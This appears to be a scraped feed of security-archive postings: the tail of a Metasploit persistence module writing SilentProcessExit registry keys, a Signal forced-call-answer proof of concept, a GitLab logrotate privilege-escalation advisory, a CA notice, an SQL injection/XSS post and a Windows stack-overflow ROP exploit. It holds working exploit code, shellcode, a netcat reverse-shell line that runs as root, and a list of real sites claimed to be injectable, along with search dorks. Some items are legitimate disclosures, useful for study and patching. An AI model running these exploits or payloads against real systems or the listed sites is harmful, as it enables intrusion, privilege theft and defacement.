# values under HKLM is a high-signal artifact of this technique.
def write_reg_keys(image_file, payload_pathname)
reg_keys = []
reg_keys.push(key_name: "HKLM\\SOFTWARE\\Microsoft\\Windows NT\\CurrentVersion\\Image File Execution Options\\#{image_file}",
value_name: "GlobalFlag",
type: "REG_DWORD",
value_value: 512)
reg_keys.push(key_name: "HKLM\\SOFTWARE\\Microsoft\\Windows NT\\CurrentVersion\\SilentProcessExit\\#{image_file}",
value_name: "ReportingMode",
type: "REG_DWORD",
value_value: 1)
reg_keys.push(key_name: "HKLM\\SOFTWARE\\Microsoft\\Windows NT\\CurrentVersion\\SilentProcessExit\\#{image_file}",
value_name: "MonitorProcess",
type: "REG_SZ",
value_value: payload_pathname)
# The parent SilentProcessExit key does not exist on a clean system.
silent_process_exit_key = "HKLM\\SOFTWARE\\Microsoft\\Windows NT\\CurrentVersion\\SilentProcessExit"
registry_createkey(silent_process_exit_key) unless registry_key_exist?(silent_process_exit_key)
reg_keys.each do |key|
registry_createkey(key[:key_name]) unless registry_key_exist?(key[:key_name])
vprint_status("Writing #{key[:value_name]} to #{key[:key_name]}")
registry_setvaldata(key[:key_name], key[:value_name], key[:value_value], key[:type])
# Read-back check; `return` inside the block leaves the whole method.
unless registry_getvalinfo(key[:key_name], key[:value_name])
print_error("Failed to set #{key[:value_name]} for #{key[:key_name]}")
return false
end
end
end

# Entry point. Builds the payload path, writes the registry values and only
# then uploads the payload, so a failed upload leaves MonitorProcess pointing
# at a file that does not exist. Note that `||` only substitutes the
# defaults for nil/false options; an empty-string PATH is used as given.
def exploit
validate_active_host
payload_name = datastore['PAYLOAD_NAME'] || Rex::Text.rand_text_alpha((rand(8) + 6))
temp_path = datastore['PATH'] || session.sys.config.getenv('TEMP')
image_file = datastore['IMAGE_FILE']
payload_pathname = temp_path + "\\" + payload_name + '.exe'
vprint_status("Payload pathname = #{payload_pathname}")
upload_payload(payload_pathname) if write_reg_keys(image_file, payload_pathname)
end
end


WhatWeb Scanner 0.5.0


WhatWeb identifies websites. Its goal is to answer the question, "What is that Website?". WhatWeb recognises web technologies including content management systems (CMS), blogging platforms, statistic/analytics packages, JavaScript libraries, web servers, and embedded devices. WhatWeb has over 1800 plugins, each to recognise something different. WhatWeb also identifies version numbers, email addresses, account IDs, web framework modules, SQL errors, and more.


MD5 | 3dc99c5f128d3866273f05cd77548a2f



Signal Forced Call Acceptance


There is a logic error in Signal that can cause an incoming call to be answered even if the callee does not pick it up.


MD5 | cfd5f34a2c4720cf69df48f6e4d12c1c

Signal: Incoming call can be connected without user interaction

There is a logic error in Signal that can cause an incoming call to be answered even if the callee does not pick it up.

In the Android client, there is a method handleCallConnected that causes the call to finish connecting. During normal use, it is called in two situations: when the callee device accepts the call because the user selects 'accept', and when the caller device receives an incoming "connect" message indicating that the callee has accepted the call. Using a modified client, it is possible to send the "connect" message to a callee device when an incoming call is in progress, but has not yet been accepted by the user. This causes the call to be answered, even though the user has not interacted with the device. The connected call will only be an audio call, as the user needs to manually enable video in all calls. The iOS client has a similar logical problem, but the call is not completed due to an error in the UI caused by the unexpected sequence of states. I would recommend improving the logic in both clients, as it is possible the UI problem doesn't occur in all situations.

To reproduce this problem on the Android client, replace the method handleSetMuteAudio in the file WebRtcCallService.java with the following method.

// Proof-of-concept replacement for WebRtcCallService.handleSetMuteAudio from
// the report above. Instead of toggling mute it sends a Connected message
// for the current call over the data channel (the message the callee would
// normally send on accept) and then runs the local handleCallConnected path,
// so the remote device connects the call without its user accepting it.
// The \" sequences are escaping artifacts of how the report was captured,
// not part of the Java source.
private void handleSetMuteAudio(Intent intent) {

    Log.e(TAG, \"SENDING MESSAGE\");

    // Build and send the Connected message carrying this call's id.
    this.dataChannel.send(new DataChannel.Buffer(ByteBuffer.wrap(Data.newBuilder().setConnected(Connected.newBuilder().setId(this.callId)).build().toByteArray()), false));

    // Complete the local side as if the remote party had accepted.
    intent.putExtra(EXTRA_CALL_ID, this.callId);
    intent.putExtra(EXTRA_REMOTE_ADDRESS, recipient.getAddress());
    handleCallConnected(intent);
}

Then build the client and install it and make a call. When the call is ringing, the audio mute button can be pressed to force the callee device to connect, and audio from the callee device will be audible.

This bug is subject to a 90 day disclosure deadline. After 90 days elapse
or a patch has been made broadly available (whichever is earlier), the bug
report will become visible to the public.





Found by: natashenka@google.com


GitLab Omnibus 12.2.1 Logrotate Privilege Escalation


Gitlab Omnibus versions 7.4 through 12.2.1 suffer from a privilege escalation vulnerability that leverages a race condition in logrotate, resulting in a root shell.


MD5 | 3955d1e8b33d1e3a16022e0127d1dc28

# Privilege Escalation via Logrotate in Gitlab Omnibus 

## Overview
Identifier: AIT-SA-20190930-01
Target: GitLab Omnibus
Vendor: GitLab
Version: 7.4 through 12.2.1
Fixed in Version: 12.2.3, 12.1.8 and 12.0.8
CVE: CVE-2019-15741
Accessibility: Local
Severity: Low
Author: Wolfgang Hotwagner (AIT Austrian Institute of Technology)


## Summary
Omnibus GitLab is a way to package different services and tools required to run GitLab, so that most users can install it without laborious configuration.


## Vulnerability Description
GitLab Omnibus sets the ownership of the log directory to the system-user "git", which might let local users obtain root access because of unsafe
interaction with logrotate.

User “git” owns the log directory /var/log/gitlab:

```
# logdir in gitlab-ee:
drwxr-xr-x 19 git root 4096 May 12 18:43 /var/log/gitlab/
```

Log files are rotated once a day (or at any other configured frequency) by logrotate, running as user root. The configuration does not use the “su” directive, so logrotate keeps root privileges while working inside the git-owned directory:
```
# logrotate-config of gitlab-ee:
/var/log/gitlab/gitlab-workhorse/*.log {
hourly
rotate 30
compress
copytruncate
missingok
postrotate
endscript
}
```

Because logrotate is prone to a race condition, it is possible for user "git" to replace the
directory /var/log/gitlab/gitlab-workhorse/ with a symbolic link to any
directory (for example /etc/bash_completion.d). Logrotate, running as user “root”, will then place
files into /etc/bash_completion.d and set the owner of the file to "git".
An attacker could simply place a reverse shell into this file. As soon as root logs in, a reverse
root shell will be executed.

Details of the race-condition in logrotate can be found at:
* https://tech.feedyourhead.at/content/details-of-a-logrotate-race-condition
* https://tech.feedyourhead.at/content/abusing-a-race-condition-in-logrotate-to-elevate-privileges
* https://github.com/whotwagner/logrotten

## Proof of Concept
The following example illustrates how an attacker who has already gained a shell as user “git” can elevate his privileges to “root”. After downloading and compiling,
the exploit is executed and waits until the next daily run of logrotate. If the rotation of the log file succeeds, a new file that contains the reverse shell
payload will be written into /etc/bash_completion.d/ with owner “git”. As soon as root logs in, the reverse shell is executed and opens a shell on the
attacker's netcat listener:

```
git@Stretch64:~$ git clone https://github.com/whotwagner/logrotten.git
/tmp/logrotten
Cloning into '/tmp/logrotten'...
remote: Enumerating objects: 84, done.
remote: Counting objects: 100% (84/84), done.
remote: Compressing objects: 100% (58/58), done.
remote: Total 84 (delta 35), reused 64 (delta 24), pack-reused 0
Unpacking objects: 100% (84/84), done.
git@Stretch64:~$ cd /tmp/logrotten && gcc -o logrotten logrotten.c
git@Stretch64:/tmp/logrotten$ ./logrotten -c /var/log/gitlab/gitlab-
workhorse/something.log
Waiting for rotating /var/log/gitlab/gitlab-workhorse/something.log...
Renamed /var/log/gitlab/gitlab-workhorse with /var/log/gitlab/gitlab-workhorse2
and created symlink to /etc/bash_completion.d
Done!
git@Stretch64:/tmp/logrotten$ ls -l /etc/bash_completion.d/
total 20
-rw-r--r-- 1 root root 439 Sep 28 2018 git-prompt
-rw-r--r-- 1 root root 11144 Oct 28 2018 grub
-rw-r--r-- 1 git git 33 May 12 18:44 something.log.1.gz
git@Stretch64:/tmp/logrotten$ echo "if [ \`id -u\` -eq 0 ]; then (/bin/nc -e
/bin/bash localhost 3333 &); fi"> /etc/bash_completion.d/something.log.1.gz
git@Stretch64:/tmp/logrotten$ nc -nvlp 3333
listening on [any] 3333 ...
connect to [127.0.0.1] from (UNKNOWN) [127.0.0.1] 55526
id
uid=0(root) gid=0(root) groups=0(root)
ls -la
total 32
drwx------ 4 root root 4096 May 12 18:47 .
drwxr-xr-x 22 root root 4096 Apr 25 18:31 ..
-rw------- 1 root root 1405 May 12 19:59 .bash_history
-rw-r--r-- 1 root root 570 Jan 31 2010 .bashrc
drwx------ 3 root root 4096 May 12 18:47 .config
-rw-r--r-- 1 root root 148 Aug 17 2015 .profile
drwx------ 2 root root 4096 Apr 25 18:40 .ssh
-rw------- 1 root root 2194 May 12 17:29 .viminfo
```

## Vulnerable Versions
7.4 through 12.2.1

## Impact
An attacker who already achieved a valid shell as user “git” could elevate the privileges to “root”. The fact that another exploit is
needed to get a shell lowers the severity from high to low.

## Solution
Update to GitLab Security Release: 12.2.3, 12.1.8, and 12.0.8

## References:
* https://about.gitlab.com/2019/08/29/security-release-gitlab-12-dot-2-dot-3-released/
* https://gitlab.com/gitlab-org/omnibus-gitlab/issues/4380
* https://hackerone.com/reports/578119

## Vendor Contact Timeline

* `2019-05-12` Contacting vendor through HackerOne
* `2019-05-31` GitLab acknowledges the vulnerability
* `2019-08-22` Notification from GitLab about the release that includes a patch
* `2019-08-30` GitLab changed the severity from high to low and released an update that fixed the problem
* `2019-09-30` Public disclosure

## Advisory URL
http://www.ait.ac.at/ait-sa-20190930-01-privilege-escalation-via-logrotate-in-gitlab-omnibus






CA Network Flow Analysis 9.x / 10.0.x Remote Command Execution


CA Technologies, a Broadcom Company, is alerting customers to a potential risk with CA Network Flow Analysis. A vulnerability exists that can allow a remote attacker to execute arbitrary commands. CA published a solution to address the vulnerabilities and recommends that all affected customers implement this solution. The vulnerability occurs due to default credentials and a configuration weakness. A malicious actor may use the default credentials and exploit a weakness in the configuration to execute arbitrary commands on the CA Network Flow Analysis server. Versions 9.x and 10.0.x are affected.


MD5 | 8114522ce19045f44906d1e2af524b4f

-----BEGIN PGP SIGNED MESSAGE-----
Hash: SHA256

CA20190930-01: Security Notice for CA Network Flow Analysis

Issued: September 30th, 2019

CA Technologies, a Broadcom Company, is alerting customers to a
potential risk with CA Network Flow Analysis. A vulnerability exists
that can allow a remote attacker to execute arbitrary commands. CA
published a solution to address the vulnerabilities and recommends
that all affected customers implement this solution.

The vulnerability, CVE-2019-13658, occurs due to default credentials
and a configuration weakness. A malicious actor may use the default
credentials and exploit a weakness in the configuration to execute
arbitrary commands on the CA Network Flow Analysis server.

Risk Rating

High

Platform(s)

All supported platforms

Affected Products

CA Network Flow Analysis 10.0.x
CA Network Flow Analysis 9.x

How to determine if the installation is affected

Customers may use the product version to determine if their product
installation is affected.

Solution

The following solution is available to address the vulnerability.
Note that the typical deployment of CA Network Flow Analysis is in an
internal network and system administrators should restrict access to
sensitive ports (see Firewall Configuration) on the CA Network Flow
Analysis server.

CA Network Flow Analysis 9.x and 10.0.x:
Customers should update to CA Network Flow Analysis 10.0.2 or later
and change the MySQL passwords as described at Configure MySQL User
Password.

References

CVE-2019-13658 - CA Network Flow Analysis default credentials

Acknowledgement

CVE-2019-13658 - Hendrik Van Belleghem

Change History

Version 1.0: 2019-09-30 - Initial Release

CA customers may receive product alerts and advisories by subscribing
to Proactive Notifications on the support site.

Customers who require additional information about this notice may
contact CA Technologies Support at https://casupport.broadcom.com/

To report a suspected vulnerability in a CA Technologies product,
please send a summary to CA Technologies Product Vulnerability
Response at ca.psirt <AT> broadcom.com

Security Notices, PGP key, and disclosure policy and guidance
www.ca.com/us/support/ca-support-online/documents.aspx?id=177782

Kevin Kotas
CA Product Security Incident Response Team

Copyright 2019 Broadcom. All Rights Reserved. The term "Broadcom"
refers to Broadcom Inc. and/or its subsidiaries. Broadcom, the pulse
logo, Connecting everything, CA Technologies and the CA technologies
logo are among the trademarks of Broadcom. All trademarks, trade
names, service marks and logos referenced herein belong to their
respective companies.

-----BEGIN PGP SIGNATURE-----
Charset: utf-8

wsBVAwUBXZPob7Z6yOO9o8STAQhMrgf9HCSLc6uH4otJkEQIGNvVeNWaPDWTP9dm
ujWAXvnUJuL7lxzwEr31AAInxGHTi2dglMHoz7lBJ5KR7PCkTGImic1Oez+CyDt1
Pdu3KU/q4ZMRlek3BQZIwyDtCpa1v7jvd6YVAFACOKjK40abTaq5V7kKyRn33QWE
QG4wNiMj2Rh10v5wss00RxPHDO7OXFh8C1lXZMW7bFZ0XvpDml4jyOIsZ2vEodbA
JyFBJN970Ibea32wP0DhhDtW4A84q0V/6ZFlZboLoysuOHWJ65CNJH5waNkvjOyj
YsL1Vt+ou5O7VMY7mPjrh4IwJXdKSYZy+Vg9NcTAvDpzEnjH9ioGbA==
=zr/3
-----END PGP SIGNATURE-----

Thailand Union Library Management 6.2 SQL Injection / XSS


Thailand Union Library Management version 6.2 suffers from cross site scripting and remote SQL injection vulnerabilities.


MD5 | 72bf47bf8eaab7c228ce951378e6c581

###################################################################

# Exploit Title : Thailand Union Library Management 6.2 Cross Site Scripting SQL Injection
# Author [ Discovered By ] : KingSkrupellos
# Team : Cyberizm Digital Security Army
# Date : 07/10/2019
# Vendor Homepage : ulibm.net - 202.29.234.1/ULIB/index.php
# Software Affected Versions : 6 and 6.2
# Tested On : Windows and Linux
# Category : WebApps
# Exploit Risk : Medium
# Google Dorks :
inurl:/ULIB/about.php site:ac.th
inurl:/searching.php?SUBJECT= site:ac.th
ULIB inurl:/searching.php?SUBJECT= site:ac.th
# Vulnerability Type : CWE-89 [ Improper Neutralization of
Special Elements used in an SQL Command ('SQL Injection') ]
CWE-79 [ Improper Neutralization of Input During
Web Page Generation ('Cross-site Scripting') ]
# PacketStormSecurity : packetstormsecurity.com/files/authors/13968
# CXSecurity : cxsecurity.com/author/KingSkrupellos/1/
# Exploit4Arab : exploit4arab.org/author/351/KingSkrupellos

###################################################################

# Impact :
***********
Thailand Union Library Management 6.2 is prone to an SQL-injection
vulnerability because it fails to sufficiently sanitize user-supplied data before using
it in an SQL query. Exploiting this issue could allow an attacker to compromise the
application, access or modify data, or exploit latent vulnerabilities in the underlying database.
A remote attacker can send a specially crafted request to the vulnerable application and
execute arbitrary SQL commands in the application's database. Further exploitation of this
vulnerability may result in unauthorized data manipulation.
An attacker can exploit this issue using a browser or any SQL injection tool.

Reflected XSS (or Non-Persistent) :
***************************************
The server reads data directly from the HTTP request and reflects it back in the HTTP response.
Reflected XSS exploits occur when an attacker causes a victim to supply dangerous content
to a vulnerable web application, which is then reflected back to the victim and executed by the
web browser. The most common mechanism for delivering malicious content is to include
it as a parameter in a URL that is posted publicly or e-mailed directly to the victim.
URLs constructed in this manner constitute the core of many phishing schemes, whereby
an attacker convinces a victim to visit a URL that refers to a vulnerable site. After the site reflects
the attacker's content back to the victim, the content is executed by the victim's browser.

###################################################################

# SQL Injection Exploit :
**********************
/ULIB/searching.php?MSUBJECT=[SQL Injection]

/PATH-HERE/searching.php?MSUBJECT=[SQL Injection]

# Cross Site Scripting XSS Exploit :
********************************
/ULIB/searching.php?MSUBJECT=1%27%3Cmarquee%3E%3Cfont%20color=
lime%20size=32%3EHacked.By.KingSkrupellos%3C/font%3E%3C/marquee%3E

###################################################################

# Example Vulnerable Sites :
*************************
[+] 202.29.234.1/ULIB/searching.php?MSUBJECT=1%27

[+] 202.129.46.118/ULIB6NEW/searching.php?MSUBJECT=1%27

[+] 110.164.92.12/ULIB/searching.php?MSUBJECT=1%27

[+] pckpb.ac.th/ULIB6NEW/searching.php?MSUBJECT=1%27

[+] library.tni.ac.th/ulib/searching.php?MSUBJECT=1%27

[+] library.kku.ac.th/ulib/searching.php?MSUBJECT=1%27

[+] smnc.ac.th/ULIB6/searching.php?MSUBJECT=1%27

[+] library.phcsuphan.ac.th/searching.php?MSUBJECT=1%27

[+] lib.svit.ac.th/ULIB6/searching.php?MSUBJECT=1%27

[+] library.phcsuphan.ac.th/searching.php?MSUBJECT=1%27

[+] bcnlp.ac.th/ULIB6/searching.php?MSUBJECT=1%27

[+] ulibm.bcnsprnw.ac.th/ULIB6/searching.php?MSUBJECT=1%27

[+] library.cvc.ac.th/ulib/searching.php?MSUBJECT=1%27

[+] ulib.samakkhi.ac.th/ulib/searching.php?MSUBJECT=1%27

[+] ulib.bcnsurin.ac.th/ULIB/searching.php?MSUBJECT=1%27

###################################################################

# Example SQL Database Error :
****************************
mysqli: You have an error in your SQL syntax; check the manual that corresponds t
o your MySQL server version for the right syntax to use near ''1''' at line 1
select * from ignoreword where word='1''
select count(id) as tmpqcount FROM index_db where
ispublish='yes' and 1 AnD ( (subj like '%1'%' ) )
SELECT id,titl,auth,bibrating,mid,remoteindex FROM index_db where
ispublish='yes' and 1 AnD ( (subj like '%1'%' ) ) order by titl asc LIMIT 0,12

###################################################################

# Discovered By KingSkrupellos from Cyberizm.Org Digital Security Team

###################################################################

ASX To MP3 Converter 3.1.3.7 Local Stack Overflow


ASX to MP3 Converter version 3.1.3.7 .asx local stack overflow exploit.


MD5 | 20f8d66dda4e923b5433ade635fb4ca1

# Exploit Title: ASX to MP3 converter 3.1.3.7 - '.asx' Local Stack Overflow (DEP)
# Google Dork: N/A
# Date: 2019-10-06
# Exploit Author: max7253
# Vendor Homepage: http://www.mini-stream.net/
# Software Link: https://www.exploit-db.com/apps/f4da5b43ca4b035aae55dfa68daa67c9-ASXtoMP3Converter.exe
# Version: 3.1.3.7.2010.11.05
# Tested on: Microsoft Windows 7 Enterprise, 6.1.7601 Service Pack 1 Build 7601, x64-based PC
# CVE : N/A

# Note: There is a similar exploit published, but it does not work on the OS I used:
# https://www.exploit-db.com/exploits/42963
# That exploit's ROP chain uses addresses from ASLR-enabled modules; it is unclear which OS it was tested on.


import struct
# Output file written at the end of the script. From a defender's view, the
# resulting .asx is recognisable: a "http://" prefix followed by ~17 KB of a
# single repeated byte, then binary data, instead of a short playlist URL.
file = 'fuzz_rop.asx'
#Tested on
#OS Name: Microsoft Windows 7 Enterprise
#OS Version: 6.1.7601 Service Pack 1 Build 7601
#System Type: x64-based PC

#msfvenom -p windows/exec cmd=calc.exe -a x86 -b '\x00\x09\x0a' -f python
# `buf` is a bytes literal (b""); `payload` below is built as str. Mixing the
# two only works on Python 2 — on Python 3 the `payload += buf` line raises
# TypeError, so the script appears to assume a Python 2 interpreter.
buf = b""
buf += b"\xda\xd7\xbf\xf1\xca\xd1\x3f\xd9\x74\x24\xf4\x5a\x29"
buf += b"\xc9\xb1\x31\x83\xc2\x04\x31\x7a\x14\x03\x7a\xe5\x28"
buf += b"\x24\xc3\xed\x2f\xc7\x3c\xed\x4f\x41\xd9\xdc\x4f\x35"
buf += b"\xa9\x4e\x60\x3d\xff\x62\x0b\x13\x14\xf1\x79\xbc\x1b"
buf += b"\xb2\x34\x9a\x12\x43\x64\xde\x35\xc7\x77\x33\x96\xf6"
buf += b"\xb7\x46\xd7\x3f\xa5\xab\x85\xe8\xa1\x1e\x3a\x9d\xfc"
buf += b"\xa2\xb1\xed\x11\xa3\x26\xa5\x10\x82\xf8\xbe\x4a\x04"
buf += b"\xfa\x13\xe7\x0d\xe4\x70\xc2\xc4\x9f\x42\xb8\xd6\x49"
buf += b"\x9b\x41\x74\xb4\x14\xb0\x84\xf0\x92\x2b\xf3\x08\xe1"
buf += b"\xd6\x04\xcf\x98\x0c\x80\xd4\x3a\xc6\x32\x31\xbb\x0b"
buf += b"\xa4\xb2\xb7\xe0\xa2\x9d\xdb\xf7\x67\x96\xe7\x7c\x86"
buf += b"\x79\x6e\xc6\xad\x5d\x2b\x9c\xcc\xc4\x91\x73\xf0\x17"
buf += b"\x7a\x2b\x54\x53\x96\x38\xe5\x3e\xfc\xbf\x7b\x45\xb2"
buf += b"\xc0\x83\x46\xe2\xa8\xb2\xcd\x6d\xae\x4a\x04\xca\x40"
buf += b"\x01\x05\x7a\xc9\xcc\xdf\x3f\x94\xee\x35\x03\xa1\x6c"
buf += b"\xbc\xfb\x56\x6c\xb5\xfe\x13\x2a\x25\x72\x0b\xdf\x49"
buf += b"\x21\x2c\xca\x29\xa4\xbe\x96\x83\x43\x47\x3c\xdc"

# The whole file body is one oversized URL: a fixed-length filler overruns the
# buffer, then the saved return address is overwritten with a packed 32-bit
# little-endian value. Every address below is in the 0x100xxxxx range and the
# inline comments attribute them to MSA2Mfilter03.dll, i.e. a module loaded at
# a fixed base — which is why the author notes this chain, unlike the earlier
# one, does not depend on ASLR'd modules. Mitigation on the product side is
# bounds-checking the URL length; on the platform side, forcing ASLR for that
# DLL (or mandatory ASLR) removes the fixed addresses this chain relies on.
payload = "http://"
payload += "A" * 17417 + struct.pack('<L', 0x1002D038) + "CCCC"

## Save allocation type (0x1000) in EDX
payload += struct.pack('<L', 0x10047F4D) # ADC EDX,ESI # POP ESI # RETN
payload += struct.pack('<L', 0x11111111)
payload += struct.pack('<L', 0x10029B8C) # XOR EDX,EDX # RETN
payload += struct.pack('<L', 0x1002D493) # POP EDX # RETN
payload += struct.pack('<L', 0xEEEEFEEF)
payload += struct.pack('<L', 0x10047F4D) # ADC EDX,ESI # POP ESI # RETN
payload += struct.pack('<L', 0x41414141)

## Save the address of VirtualAlloc() in ESI
payload += struct.pack('<L', 0x1002fade) # POP EAX # RETN [MSA2Mfilter03.dll]
payload += struct.pack('<L', 0x1004f060) # ptr to &VirtualAlloc() [IAT MSA2Mfilter03.dll]
payload += struct.pack('<L', 0x1003239f) # MOV EAX,DWORD PTR DS:[EAX] # RETN [MSA2Mfilter03.dll]
payload += struct.pack('<L', 0x10040754) # PUSH EAX # POP ESI # POP EBP # LEA EAX,DWORD PTR DS:[ECX+EAX+D] # POP EBX # RETN
payload += struct.pack('<L', 0x41414141)
payload += struct.pack('<L', 0x41414141)

## Save the size of the block in EBX
payload += struct.pack('<L', 0x1004d881) # XOR EAX,EAX # RETN
payload += struct.pack('<L', 0x1003b34d) # ADD EAX,29 # RETN
payload += struct.pack('<L', 0x1003b34d) # ADD EAX,29 # RETN
payload += struct.pack('<L', 0x1003b34d) # ADD EAX,29 # RETN
payload += struct.pack('<L', 0x1003b34d) # ADD EAX,29 # RETN
payload += struct.pack('<L', 0x1003b34d) # ADD EAX,29 # RETN
payload += struct.pack('<L', 0x1003b34d) # ADD EAX,29 # RETN
payload += struct.pack('<L', 0x1003b34d) # ADD EAX,29 # RETN
payload += struct.pack('<L', 0x1003b34d) # ADD EAX,29 # RETN
payload += struct.pack('<L', 0x1003b34d) # ADD EAX,29 # RETN
payload += struct.pack('<L', 0x10034735) # PUSH EAX # ADD AL,5D # MOV EAX,1 # POP EBX # RETN

## Save the address of (# ADD ESP,8 # RETN) in EBP
payload += struct.pack('<L', 0x10031c6c) # POP EBP # RETN
payload += struct.pack('<L', 0x10012316) # ADD ESP,8 # RETN
#payload += struct.pack('<L', 0x1003df73) # & PUSH ESP # RETN

## Save memory protection code (0x40) in ECX
payload += struct.pack('<L', 0x1002ca22) # POP ECX # RETN
payload += struct.pack('<L', 0xFFFFFFFF)
payload += struct.pack('<L', 0x10031ebe) # INC ECX # AND EAX,8 # RETN
payload += struct.pack('<L', 0x10031ebe) # INC ECX # AND EAX,8 # RETN
payload += struct.pack('<L', 0x1002a5b7) # ADD ECX,ECX # RETN
payload += struct.pack('<L', 0x1002a5b7) # ADD ECX,ECX # RETN
payload += struct.pack('<L', 0x1002a5b7) # ADD ECX,ECX # RETN
payload += struct.pack('<L', 0x1002a5b7) # ADD ECX,ECX # RETN
payload += struct.pack('<L', 0x1002a5b7) # ADD ECX,ECX # RETN
payload += struct.pack('<L', 0x1002a5b7) # ADD ECX,ECX # RETN

## Save ROP-NOP in EDI
payload += struct.pack('<L', 0x1002e346) # POP EDI # RETN
payload += struct.pack('<L', 0x1002D038) # RETN

## Save NOPs in EAX
#payload += struct.pack('<L', 0x1003bca4) # POP EAX # RETN [MSA2Mfilter03.dll]
#payload += struct.pack('<L', 0x90909090) # nop

## Set up the EAX register to contain the address of # PUSHAD #RETN and JMP to this address
payload += struct.pack('<L', 0x1002E516) # POP EAX # RETN
payload += struct.pack('<L', 0xA4E2F275)
payload += struct.pack('<L', 0x1003efe2) # ADD EAX,5B5D5E5F # RETN
payload += struct.pack('<L', 0x10040ce5) # PUSH EAX # RETN

payload += "\x90" * 4
payload += struct.pack('<L', 0x1003df73) # & PUSH ESP # RETN
payload += "\x90" * 20
# See the note on `buf` above: str + bytes, Python 2 only.
payload += buf

# Written in text mode ('w'), not 'wb'. On Windows text mode rewrites 0x0a as
# 0x0d 0x0a; the msfvenom bad-char list excludes 0x0a and none of the packed
# addresses above appear to contain that byte, which is presumably why this
# has not bitten the author — a binary mode open would be the safer choice.
# The handle is closed explicitly rather than via `with`.
f = open(file,'w')
f.write(payload)
f.close()
